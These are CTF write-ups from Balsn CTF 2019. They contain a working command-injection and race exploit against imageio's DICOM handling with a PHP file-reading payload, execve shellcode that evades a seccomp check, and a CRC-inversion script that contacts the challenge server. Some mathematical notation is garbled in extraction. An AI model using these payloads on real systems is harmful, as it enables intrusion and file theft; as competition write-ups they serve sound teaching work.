Balsn CTF 2019 writeups

In this CTF, we destroyed both LC↯BC and PPP. lol.

Silhouettes

0xbb | web, 1000 points

We are presented with a minimal AI web challlenge. It uses AI (PHP + Python) to determine the shape of any image format using a current version of imageio. Additionally it’s stated that the author installed all necessary external plugins (beside Ghostscript) and the challenge server is running Windows Server 2019.

Challenge Source Code

index.php:

<?php
...
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $file = $_FILES["file"];
    if ($file["size"] > 1000000)
        die("file too large");
    set_time_limit(15);
    ini_set('max_execution_time', 15);
    $name = "C:/upload/" . basename($_FILES["file"]["name"]);
    move_uploaded_file($file["tmp_name"], $name);
    system("python getsize.py ".escapeshellarg($name));
    unlink($name);
    die();
}
...

getsize.py:

import sys, imageio
assert imageio.__version__ == '2.5.0'
print('(w, h) =', imageio.imread(sys.argv[1]).shape[:2])

Analysis

We can upload arbitrary files to c:/upload/ and even set our own file name (restricted by basename). The upload logic hinted at some command injection in the imageio package. So we decided to grep for the most basic things in the huge amount of supported image formats:

~/.local/lib/python3.7/site-packages/imageio$ grep -iR subprocess
plugins/dicom.py:import subprocess
plugins/dicom.py:        subprocess.check_call([fname, "--version"], shell=True)
plugins/dicom.py:                            subprocess.check_call([exe, fname1, fname2], shell=True)
...

The search seemed very fruitful as we are offered a nice subprocess.check_call even with the shell=True parameter set.

dicom.py

...
try:
    dcm = _dicom.SimpleDicomReader(self.request.get_file())
except _dicom.CompressedDicom as err:
    if "JPEG" in str(err):
        exe = get_dcmdjpeg_exe()
        if not exe:
            raise
        fname1 = self.request.get_local_filename()
        fname2 = fname1 + ".raw"
        try:
            print(exe,fname1,fname2)
            exit()
            subprocess.check_call([exe, fname1, fname2], shell=True)
...

In the snippet it’s visible that if the dcim file contains a JPEG compressed image it’s simply passed into dcmjpeg.exe even with the original filename.

We tried to craft an exploit command via the filename, but there were some problems with allowed characters in filenames.

Finally, we used filename&php to terminate the arguments of dcmjpeg.exe and start php with the filename as an arg: dcmjpeg.exe filename&php filename&php.raw

So we need to create a correct DCIM + JPEG file. Additionally, we use a second upload to race the first one to pass a PHP payload into the same file.

Final Exploit

#!/usr/bin/env python3
import requests, os, threading, time, uuid
url = 'http://silhouettes.balsnctf.com/'
f = str(uuid.uuid4())+'.dcm'

assert os.system('convert -size 1x1 xc:white hxp.jpg && img2dcm hxp.jpg hxp.dcm') == 0

def helper():
	""" race with other upload """
	while True:
	    files = [(
	        ('file', (f, '<?php chdir("c:/");foreach(scandir(".") as $a){echo $a."\n";if(strpos($a,"F")!==false)echo file_get_contents($a);}', 'hxp/<3balsn'))
	    )]

	    response = requests.post(url, files=files)
	    print('.', end='', flush=True)

threading.Thread(target=helper).start()
time.sleep(0.5)

while True:
	payload = '&php'
	files = [(
		('file', (f+payload, open('hxp.dcm', 'rb'), 'hxp/1337'))
	)]

	response = requests.post(url, files=files)
	print(response.content.decode())

Output + Flag:

...
install.res.3082.dll
pagefile.sys
upload
vcredist.bmp
 F!ag#$%&'()+,-.;=@[]^_`{}~ <- lol, thx Balsn
Balsn{Image_I0_7ragic!_I5_I7_a_z3r0_day?}

Hack Compiler

aengelke | rev, 690 points

In this challenge we were given an assembly file consisting of ~31k lines for the Hack machine. The instruction set in fact deserves the term RISC (as opposed to, e.g., ARM): it has two registers (A and D), a pseudo-register for memory access, and only very few instructions. The code was generated using some compiler, which also includes a standard library.

Memory layout

Here is the beginning of the program:

@15872
D=A
@15616
M=D
@15617
M=D
@HPJCDQDO
D=A
@15617
A=M
M=D
@15617
...

An instruction beginning with an @ loads the following immediate operand into the A register. The first thing to notice are the high numbers — which look like addresses due to their frequent occurance. The compiler contains some documentation on the memory layout. After digging into the compiler source, the following usage becomes evident:

  • 0x3d00-0x3dff: “Flag” storage, used for global variables, the stack pointer, and temporary storage needed by the compiler
  • 0x3e00-0x3fff: “Stack”, used for storing local variables
  • 0x4000-0x5fff: “Screen”
  • 0x6000: Keyboard input

By patching the compiler to print the assignment of variables to the “Flag” storage, we additionally get the following (not yet verified) knowledge. The output is in fact reasonable and at this point we (rightly) assume that the standard library was used for this program. This was very helpful to start understanding the program — in the above code snippet, the stack and base pointer are initialized.

  • String_set: 3d1a
  • arg: 3d16
  • cmp: 3d04
  • ebp: 3d00
  • esp: 3d01
  • tmp: 3d15
  • tmp_obj0: 3d02
  • tmp_obj1: 3d03
  • tmp_obj10: 3d0e
  • tmp_obj11: 3d0f
  • tmp_obj12: 3d10
  • tmp_obj2: 3d06
  • tmp_obj3: 3d07
  • tmp_obj4: 3d08
  • tmp_obj5: 3d09
  • tmp_obj6: 3d0a
  • tmp_obj7: 3d0b
  • tmp_obj8: 3d0c
  • tmp_obj9: 3d0d
  • var1: 3d11
  • var2: 3d12
  • var3: 3d13
  • var4: 3d14

Function calls

Next, we tried to find function calls and functions. Using some patterns coded into the compiler, this was easy to achieve. Together with some manual analysis, we found some standard library function and replaced these with pseudo-instructions in the text. The compiler also has some inlining functionality, which however keeps the prologue and epilogue and just removes the jumps. After this manual transformation (assisted with find&replace), the program contained only direct jumps.

Unfortunately, the main program was not split in functions, and still was pretty big (26k lines).

Code lifting

A full manual analysis of the code is entirely unfeasible due to size. At this point, we did some semi-automated parsing of the code, splitting the code in basic blocks and replacing the indirect M register with the explicit notion M[A]. On this basis, we did some simple textual expression folding, replacing A and D with the values from the last assignment. We also replaced the addresses of some frequently used variables (see above) with a name for readability.

The transformed code now looks like this and has only 7.2k lines:

...
Block 10
  (SEPFTDLJ)
  esp=esp+1
  var2=ebp+0x9
  M[var2]=M[0x3d1a]
  var3=ebp+0x9
  cmp=M[var3]
  /JNE(cmp) DFXDGDTT
...

We then folded the expressions setting the variables var1/var2/var3/var4, significantly increasing readability:

Block 10
  (SEPFTDLJ)
  esp=esp+1
  M[ebp+0x9]=M[0x3d1a]
  cmp=M[ebp+0x9]
  /JNE(cmp) DFXDGDTT

At this point, some frequently repeating code pattern got visible, which loaded some values from a memory location with a constant offset each, added them with a constant number, and compared them with another constant. That buffer was previously filled from the keyboard memory location — where the challenge asked the flag to be entered. So we extracted these conditions (using regexes with several manual fixups) and ended up with 78 constraints, with offsets ranging from 0–25:

(-0x13a + buf[0x5] + buf[0x6] + buf[0xd] + buf[0xf]) == 0x52
(-0xf3 + buf[0x16] + buf[0x18] + buf[0x16]) == 0x15
(-0x1c + buf[1] + buf[0xb] + buf[0x11] + buf[0x3]) == 0x13a
(0x101 + buf[0x14] + buf[0x7] + buf[0xa] + buf[0x18]) == 0x249
(0x28 + buf[0x4] + buf[0x19] + buf[0x15]) == 0x176
(-0x97 + buf[0x9] + buf[0x9] + buf[0x10] + buf[0x15]) == 0xef
(-0x1bf + buf[1] + buf[0x15] + buf[0x8] + buf[0x8]) == -0x17
(-0xe + buf[0xa] + buf[0xb] + buf[0xb]) == 0x95
(0xf8 + buf[0x10] + buf[0x13] + buf[0x15] + buf[0x13]) == 0x290
(-0x15a + buf[0xc] + buf[0x16] + buf[0x0] + buf[0x4]) == -0x12
(-0x193 + buf[0x18] + buf[0x9] + buf[1]) == -0x61
(0x45 + buf[1] + buf[0x5] + buf[0x15] + buf[0xc]) == 0x1d1
(0x8 + buf[0x0] + buf[0xc] + buf[0x7]) == 0xf6
(-0xc5 + buf[0xf] + buf[0x12] + buf[0xf]) == 0x32
(-0x8b + buf[0xd] + buf[0x19] + buf[0x0]) == 0xa4
(0x1ba + buf[0x17] + buf[1] + buf[0x14]) == 0x2b4
...

Using Z3 we found a solution for these constraints: Balsn{U_r_C0Mp1LeR_h4cKer}


SecureCheck

aengelke | misc, 330 points

In this shellcoding challenge, the program executes the code first under a forked child with a strong seccomp filter, and only if that exits cleanly, the code is executed again under the parent process without a seccomp filter.

In pseudo-code, the main function looks like this:

  page = mmap(NULL, 0x1000, RWX, MAP_PRIVATE|MAP_ANONYMOUS)
  read(0, page, 0x1000)
  pid = fork()
  if pid == 0
    init_seccomp() // only allow exit and exit_group syscalls
    goto exec_code
  if wait(pid) != 0 // if pid exited with non-zero exit code
    return 0

exec_code:
  ... // zero registers and flags
  jmp page

The shellcode must exit cleanly with code 0 the first time, so that the second time we can use execve to get a shell. As the code page is mapped as private, all mappings are copy-on-write after the fork and there is no (obvious) way to pass some indication of the execution count from the child process to the parent. In fact, we did not search for other means to detect the forked child (perhaps measuring the memory access time due to CoW page faults is feasible?).

Instead, we went for the probabilistic route. Modern x86 processors provide the instruction rdrand, which sets a register to a random value. At the beginning of the shellcode, we use a single bit of that randomness to decide whether we exit cleanly or try to run execve. This strategy succeeds with a probability of 14 — it must exit cleanly in the first execution (prob. 12) and run execve in the second execution (prob. 12).

Flag: Balsn{Sam3_Cod3_Same_Cont3xt_Diff3r3nt_World}

The full shellcode (28 bytes):

  mov al, 0x3c # exit
  rdrand ebx
  test bl, 1
  jz 1f
  lea rdi, [rdx+0x14]
  xor edx, edx # addr of current page is in rdx
  mov al, 0x3b # execve
1:syscall
2:.asciz "/bin/sh"

collision

yyyyyyy | crypto, 726 points

We are faced with a script that takes as input a password, “destroys” it using a finite-field exponentiation, AES, and DES, and finally compares its hash values under many different hash functions against known target values. If all the hash values match, we get the flag:

# [imports]

def omnihash(x):
    ret = subprocess.check_output(['omnihash', '-jcs'], input=x)
    return json.loads(ret)[0][0]


def printflag(x):
    # Update August, 2004 (commit 40de8d): MD5 is broken...
    if hashlib.sha1(x).hexdigest() != '3a4a6c4047f9350493cdabcf719d8e4f3b3c1f2f':
        print('I said you shall not pass!!!')
        return False
    
    # Update Feb, 2017 (commit 56fcd9): Fxxk, SHA1 is broken too
    if hashlib.sha3_224(x).hexdigest() != 'c529d3db40ac50bf3b5c1957b7ef4e632f6fb34ae83b165caed6658d':
        print('Why do you keep trying to hack into my home???? Go away QAQQQQQQ!!!!!')
        return False
    
    # Update May, 2019 (commit c10d5a): Check all well-known hashes

    # Destroy the value
    p = int("""\
    6816b2bba5ad70478c1beadb176b9ab17cb172841b10277f538f9d837f2\
    2bdd807b970605c63859c739571cc535fd0c6879149b2d2eb676a182fd7\
    5ff343e75a22ce75c36a775157c34f17\
    """.replace(' ', ''), 16)
    x = bytes_to_long(x)
    x = pow(x, 31337, p)
    x = long_to_bytes(x)
    
    # Destroy again
    for _ in range(10):
        k = x[:16]
        aes = AES.new(k, AES.MODE_CFB, k)
        x = aes.encrypt(x[16:]) + k

    # Destroy one more time
    x = b'QAQQAQQQ' + x
    for _ in range(10):
        k = hashlib.sha256(x[:8]).digest()[:8]
        des = DES.new(k, DES.MODE_CFB, k)
        x = k + des.encrypt(x[8:])

    # Check
    x = x + b'OAOOAOOO'
    hash = omnihash(x)
    with open('hash.json') as f:
        target = json.load(f)
    if all(hash[k] == v for k, v in target.items()):
        with open('../flag.txt') as f:
            print(f.read())

The given list of hashes in hash.json is:

{
    "BLAKE2B512": "ea79779358bda662d24c2d28ec0c3b810848302687b5665d0551265081331288ce2f8b2763e9a31cfaa52ef47a602b6c14e89a1025434c16fd5896da2d013eb0",
    "BLAKE2S256": "6ea2c8f7806c003125213b7cdbf2074b766180d2c58e2a55f36f9c9c3022ae8f",
    "BLAKE2b": "ea79779358bda662d24c2d28ec0c3b810848302687b5665d0551265081331288ce2f8b2763e9a31cfaa52ef47a602b6c14e89a1025434c16fd5896da2d013eb0",
    "BLAKE2s": "6ea2c8f7806c003125213b7cdbf2074b766180d2c58e2a55f36f9c9c3022ae8f",
    "CRC-16": "0x4a58",
    "CRC-16-BUYPASS": "0x6af0",
    "CRC-16-DDS-110": "0x48fc",
    "CRC-16-DECT": "0x2419",
    "CRC-16-DNP": "0x9d58",
    "CRC-16-EN-13757": "0x4d2e",
    "CRC-16-GENIBUS": "0x45fd",
    "CRC-16-MAXIM": "0xb5a7",
    "CRC-16-MCRF4XX": "0x67b3",
    "CRC-16-RIELLO": "0x9ece",
    "CRC-16-T10-DIF": "0xec3c",
    "CRC-16-TELEDISK": "0xc82c",
    "CRC-16-USB": "0x3556",
    "CRC-24": "0x61059d",
    "CRC-24-FLEXRAY-A": "0xf397e7",
    "CRC-24-FLEXRAY-B": "0xdd6f70",
    "CRC-32": "0x9609704aL",
    "CRC-32-BZIP2": "0x50d40806L",
    "CRC-32-MPEG": "0xaf2bf7f9L",
    "CRC-32C": "0xf1dbb20eL",
    "CRC-32D": "0xfcc86807L",
    "CRC-32Q": "0x9c13e09L",
    "CRC-64": "0xb434f60b0a312231L",
    "CRC-64-JONES": "0xc1a828859dc5cca2L",
    "CRC-64-WE": "0xa73a797a702a9d81L",
    "CRC-8": "0xd2",
    "CRC-8-DARC": "0x87",
    "CRC-8-I-CODE": "0x5e",
    "CRC-8-ITU": "0x87",
    "CRC-8-MAXIM": "0xb1",
    "CRC-8-ROHC": "0x4b",
    "CRC-8-WCDMA": "0x44",
    "CRC-AUG-CCITT": "0x643e",
    "CRC-CCITT-FALSE": "0xba02",
    "GIT-BLOB": "623a652aa849645e37e27583b4686eb53727edb1",
    "GIT-COMMIT": "a3c12b0d72a7ba07a99fd069af7c04612999ff8a",
    "GIT-TAG": "1328ff8710ff34f9fef1b982894f44cf81d74d10",
    "JAMCRC": "0x69f68fb5L",
    "KERMIT": "0x4e2e",
    "LENGTH": "91",
    "MD4": "cc6ddaafe37274d514ea0e6026235b02",
    "MD5": "4a254cb1e5a266d44eeb923bf2135e63",
    "MD5-SHA1": "4a254cb1e5a266d44eeb923bf2135e6339cb6d6bf082ad0283b3b07991b50de7c087db8c",
    "MODBUS": "0xcaa9",
    "POSIX": "0xf6273a4fL",
    "RIPEMD160": "511e1ad8a02b04e5a017b1c6250695a999f98399",
    "SHA1": "39cb6d6bf082ad0283b3b07991b50de7c087db8c",
    "SHA224": "ca2de7bcf59bc523af5bfc3d14cfa15e9de732742e20785b5f8e1c0b",
    "SHA256": "821d0319b4d80a89af03ff7df5bb7aac56363c38000273acb7e6a2858d3267b5",
    "SHA3-224": "12785de06107874d20e1b75e3efa367c00e6704b532854720616d45a",
    "SHA3-256": "2836991a2e289d04af9f9366ae0983c23e0b4f6c0597d56caf5525348c1ae51a",
    "SHA3-384": "19542c695041c5acec2ff04fe033536e41f29138a65a12a76d7f122ae5b1a6ce3cbdebc0a44c24c0e2105f7a3435ad1e",
    "SHA3-512": "6accef14e12441918be765b545ba457e9809be1515130d5d7c41df82e976fceb2c3adaba0bee5f5c81fe93ffad9b31a9c3308432d0cec7645e4a3afaf1d7aaf3",
    "SHA384": "e86e0f699f2511e6dd4798762534274204b570a1d6f771b4c9a8715dcab245aaff0a397a905d3625ef1d1d003243a51b",
    "SHA3_224": "12785de06107874d20e1b75e3efa367c00e6704b532854720616d45a",
    "SHA3_256": "2836991a2e289d04af9f9366ae0983c23e0b4f6c0597d56caf5525348c1ae51a",
    "SHA3_384": "19542c695041c5acec2ff04fe033536e41f29138a65a12a76d7f122ae5b1a6ce3cbdebc0a44c24c0e2105f7a3435ad1e",
    "SHA3_512": "6accef14e12441918be765b545ba457e9809be1515130d5d7c41df82e976fceb2c3adaba0bee5f5c81fe93ffad9b31a9c3308432d0cec7645e4a3afaf1d7aaf3",
    "SHA512": "62074634d716800b66386e0e10a601a21eedcc7fcd4d847692cf0cb9d3cdc469dbb7cbd53be4b5d5d91fdc20edf1ab1c2abe8678f04055f3ef450561771f37b1",
    "SHA512-224": "091f4443f53089fbc66bc32caf77be0090a5188a0b9eaf5100057142",
    "SHA512-256": "4b37d93916d0a2e1a0a75481049b43942f127ed33ad58288f3be555b11ae8fb3",
    "SHAKE128": "d7ae67597dc6cd63c303f59aad1151d8",
    "SHAKE256": "7bba948c75cfc3570b76772ea9d6011d150beda285c7a3253ea856253b5a0646",
    "SM3": "d5e3c17e576e22ce7797e4cd946e4f9f3b48ff9da3bf0c94a48235702c1d57cb",
    "WHIRLPOOL": "343a45063c39bf2cb95bc689744c10ce70e740b38df1c985ce5fb610b80bd9ca973d7872278dc92238a90ca2030f3c2c6129127486bb91ce82068cb0a1636e81",
    "X-25": "0x984c",
    "XFER": "0x8244182bL",
    "XMODEM": "0x396"
}

Given this, we immediately notice the presence of lots of CRCs in the list—a notoriously non-cryptographic checksum. Before recovering the plaintext from these CRCs, let’s first quickly invert the “destroy” part that’s applied to the flag prior to hashing:

def undestroy(x):
    assert x[-8:] == b'OAOOAOOO'
    x = x[8:-8]
    ks = []
    while len(ks) < 10:
        ks.append(hashlib.sha256(ks[-1] if ks else b'QAQQAQQQ').digest()[:8])
    for k in reversed(ks):
        des = DES.new(k, DES.MODE_CFB, k)
        x = des.decrypt(x)

    for _ in range(10):
        k = x[-16:]
        aes = AES.new(k, AES.MODE_CFB, k)
        x = k + aes.decrypt(x[:-16])

    x = bytes_to_long(x)
    x = int(pow(x, ZZ(Mod(31337,p-1)**-1), p))
    x = long_to_bytes(x)

    return x

(All the attack code in this writeup is sage code.)


Now let’s see how we can recover the plaintext from the CRCs. We can see that after being “destroyed”, the input to these CRCs is at most 91 bytes long; that’s the size of p plus twice 8 bytes for “QAQQAQQQ” and “OAOOAOOO”. Instead of going through the list given above, we downloaded omnihash’s source code to look for the code implementing all those hash functions; we were probably going to need that anyway. Indeed, in crcmod-1.7/python2/crcmod/predefined.py we find a big table of all CRCs in the list including their exact definitions:

_crc_definitions_table = [
#       Name                Identifier-name,    Poly            Reverse         Init-value      XOR-out     Check
    [   'crc-8',            'Crc8',             0x107,          NON_REVERSE,    0x00,           0x00,       0xF4,       ],
    [   'crc-8-darc',       'Crc8Darc',         0x139,          REVERSE,        0x00,           0x00,       0x15,       ],
    [   'crc-8-i-code',     'Crc8ICode',        0x11D,          NON_REVERSE,    0xFD,           0x00,       0x7E,       ],
    [   'crc-8-itu',        'Crc8Itu',          0x107,          NON_REVERSE,    0x55,           0x55,       0xA1,       ],
    [   'crc-8-maxim',      'Crc8Maxim',        0x131,          REVERSE,        0x00,           0x00,       0xA1,       ],
    [   'crc-8-rohc',       'Crc8Rohc',         0x107,          REVERSE,        0xFF,           0x00,       0xD0,       ],
    [   'crc-8-wcdma',      'Crc8Wcdma',        0x19B,          REVERSE,        0x00,           0x00,       0x25,       ],

    [   'crc-16',           'Crc16',            0x18005,        REVERSE,        0x0000,         0x0000,     0xBB3D,     ],
    [   'crc-16-buypass',   'Crc16Buypass',     0x18005,        NON_REVERSE,    0x0000,         0x0000,     0xFEE8,     ],
    [   'crc-16-dds-110',   'Crc16Dds110',      0x18005,        NON_REVERSE,    0x800D,         0x0000,     0x9ECF,     ],
# [...]
    [   'crc-32q',          'Crc32Q',           0x1814141AB,    NON_REVERSE,    0x00000000,     0x00000000, 0x3010BF7F, ],
    [   'jamcrc',           'CrcJamCrc',        0x104C11DB7,    REVERSE,        0xFFFFFFFF,     0x00000000, 0x340BC6D9, ],
    [   'xfer',             'CrcXfer',          0x1000000AF,    NON_REVERSE,    0x00000000,     0x00000000, 0xBD0BE338, ],
    
# 64-bit
#       Name                Identifier-name,    Poly                    Reverse         Init-value          XOR-out             Check
    [   'crc-64',           'Crc64',            0x1000000000000001B,    REVERSE,        0x0000000000000000, 0x0000000000000000, 0x46A5A9388A5BEFFE, ],
    [   'crc-64-we',        'Crc64We',          0x142F0E1EBA9EA3693,    NON_REVERSE,    0x0000000000000000, 0xFFFFFFFFFFFFFFFF, 0x62EC59E3F1A4F00A, ],
    [   'crc-64-jones',     'Crc64Jones',       0x1AD93D23594C935A9,    REVERSE,        0xFFFFFFFFFFFFFFFF, 0x0000000000000000, 0xCAA717168609F281, ],
]   

Adding up all the lengths shows that the information contained in the given CRCs is approximately 912 bits; quite a bit more than the 91 bytes we need, which inspires hope. (Note it’s not clear, nor actually true, that the given chunks contain distinct bits of information. See below.)

At this point, there’s two possible approaches:

  • Know that computing a CRC essentially consists of reducing the input modulo a fixed polynomial over F2, so we may apply the chinese-remainder theorem (CRT) to find the value of the input modulo the least common multiple of all the CRC polynomials in use. If the polynomials share not too many factors (and they shouldn’t), then the LCM is long enough to uniquely define the input and we’re done. Potential problem: Real-world CRCs are not really just modulo of polynomials over F2; there are additional complications like non-zero initial states and reversing the bits and so on. This is reflected in the table above, but it complicates the CRT approach.

  • Know that CRCs are linear and solve a linear system over F2. Note that again, this “linearity” is often not strictly true, but it’s close enough: What is always true is that CRC(xy)CRC(0)=CRC(x)CRC(y).​ (So in mathematical terms, CRC is actually an affine-linear function over F2.)

We took the second approach, thus:

  • Combine all the CRCs into a single function f:F2918F2912 by concatenating all the individual CRCs in a fixed order — by the discussion above, this function is affine-linear over F2.
  • Represent the function f as a 728×912 matrix A together with a fixed offset vector v0 of length 912 over F2: Thus f(x)=xA+v0.
  • Solve for a vector s in F2728 such that f(s)=t, i.e. sA=tv0, where t is the concatenation of all the target CRCs given in hash.json.
  • Then s interpreted as a bit string simply forms a valid input with those CRC values.

Trying this, we ran into the complication that the matrix A has quite a bit of rank defect: Fundamentally, the CRC polynomials share too many factors, so the information contained in distinct CRCs is indeed not always independent (as hinted above). Concretely, we see that the dimension of the left kernel of A is 138 — so there are 2138 different solutions s, way too many to iterate through!

To remedy this problem, we add additional known constraints from the “destroy” part of the given script: We know that the plaintext we’re looking for must begin with a ten-fold SHA256 hash of "QAQQAQQQ", cut off after 8 bytes, and similarly it must end with the string "OAOOAOOO". By augmenting A with additional columns consisting of identity matrices for those bits, and zeroes otherwise, we can reduce the rank defect to only 10, and luckily 210 guesses is enough to simply search through. Of course, we also need to augment the target vector tv0 with the known target strings. Note we can then identify the right input in our set of 210 choices simply by comparing against one of the other hashes in the given hash.json target file.


Here’s the sage script (beware, messy CTF code) that implements all of this and for convenience immediately sends the password to the server to get the flag:

# [imports and code copied from the task]

R.<x> = GF(2)[]

num2poly = lambda n: sum(((n >> i) & 1) * x**i for i in range(int(n).bit_length()+5))
poly2num = lambda f: f.change_ring(ZZ)(2)

crcs = dict()
for name,_,poly,rev,ixor,oxor,chk in _crc_definitions_table:
    crcs[name.upper()] = {
            'poly': num2poly(poly),
            'bits': int(num2poly(poly).degree()),
            'rev':  rev,
            'ixor': ZZ(ixor),
            'oxor': ZZ(oxor),
            'chk':  chk,
        }
del name,poly,rev,ixor,oxor,chk


def mycrc(name, bs):
    data = crcs[name]
    poly, bits, rev, ixor, oxor = data['poly'], data['bits'], data['rev'], data['ixor'], data['oxor']
    if rev:
        bs = ''.join(chr(int('{:08b}'.format(ord(x))[::-1],2)) for x in bs)
    res = 0
    res = num2poly(ixor ^^ oxor)
    if rev:
        res = R(x**(bits-1) * res(1/x))
    res *= x**(8*len(bs))
    res += x**bits * num2poly(bytes_to_long(bs))
    res %= poly
    if rev:
        res = R(x**(bits-1) * res(1/x))
    res += num2poly(oxor)
    return poly2num(res)


target = json.loads(open('hash.json').read())
target = {k:int(v.rstrip('L'),16) for k,v in target.items()}

names = list(sorted(crcs.keys()))
num2vec = lambda l,n: vector(GF(2), [(n >> i) & 1 for i in range(l)])

def allcrcs(bs):
    v = matrix(GF(2),1,0)
    for name in names:
        v = v.augment(num2vec(crcs[name]['bits'], mycrc(name, bs)).row())
    return v

l = 91

v0 = allcrcs(b'\0'*l)

t = matrix(GF(2),1,0)
for name in names:
    t = t.augment(num2vec(crcs[name]['bits'], target[name]).row())

# takes a while, so better cache it 
try:
    mat = load('/tmp/mat')
except IOError:
    mat = matrix(GF(2), 0, sum(crcs[name]['bits'] for name in names))
    for i in range(8*l):
        row = allcrcs(long_to_bytes(2**i).rjust(l,b'\0'))
        mat = mat.stack(row - v0)
    mat.dump('/tmp/mat')



prefix = b'QAQQAQQQ'
for _ in range(10):
    prefix = hashlib.sha256(prefix).digest()[:8]
off_prefix = 83

for i in range(8*len(prefix)):
    mat = mat.augment(vector([j==i+8*off_prefix for j in range(mat.nrows())]).column())

v0 = v0.augment(vector([0]*8*len(prefix)).row())
t = t.augment(vector((bytes_to_long(prefix) >> i) & 1 for i in range(8*len(prefix))).row())


suffix = b'OAOOAOOO'

for i in range(8*len(suffix)):
    mat = mat.augment(vector([j==i for j in range(mat.nrows())]).column())

v0 = v0.augment(vector([0]*8*len(suffix)).row())
t = t.augment(vector((bytes_to_long(suffix) >> i) & 1 for i in range(8*len(suffix))).row())



print(mat.left_kernel().dimension())
sol = vector(mat.solve_left(t - v0))
print(sol)

for kervec in mat.left_kernel():
    res = long_to_bytes(sum(ZZ(s) << i for i,s in enumerate((sol + kervec).list())))
    password = undestroy(res)
    print res.encode('hex'), password.encode('hex')
    if int(hashlib.sha256(res).hexdigest(),16) == target['SHA256']:
        print('YES!!')
        break
else:
    print('nope...')
    exit()

print('--> \x1b[32m{}\x1b[0m'.format(password.encode('hex')))
print
print('-'*40)
print


import socket, telnetlib
sock = socket.socket()

sock.connect(('collision.balsnctf.com', 5451))
sock.sendall('{}\n'.format(password.encode('hex')))

tel = telnetlib.Telnet()
tel.sock = sock
tel.interact()

Running this script prints:

10
(1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0)
5a208546900315b4003770f30d6f3342b535cbf6f6396ee48fcf4987ccecdf4e8e8fe347851f106f9faf5ff22600ecac08ef8059f83a751c83a000fd284a713ebad2ec48422f808d2ead2fd927aad2c756a8f44f414f4f414f4f4f 2be3f5e4a1e235701fbf4db26b42dfc7bc41083b1e2da552ad8737859e847930453bce9e89a4e5a70b0dd739c4c107fd880f834c687717d6ba0fbfda4dd900635950f2e0b49a9d3abee948
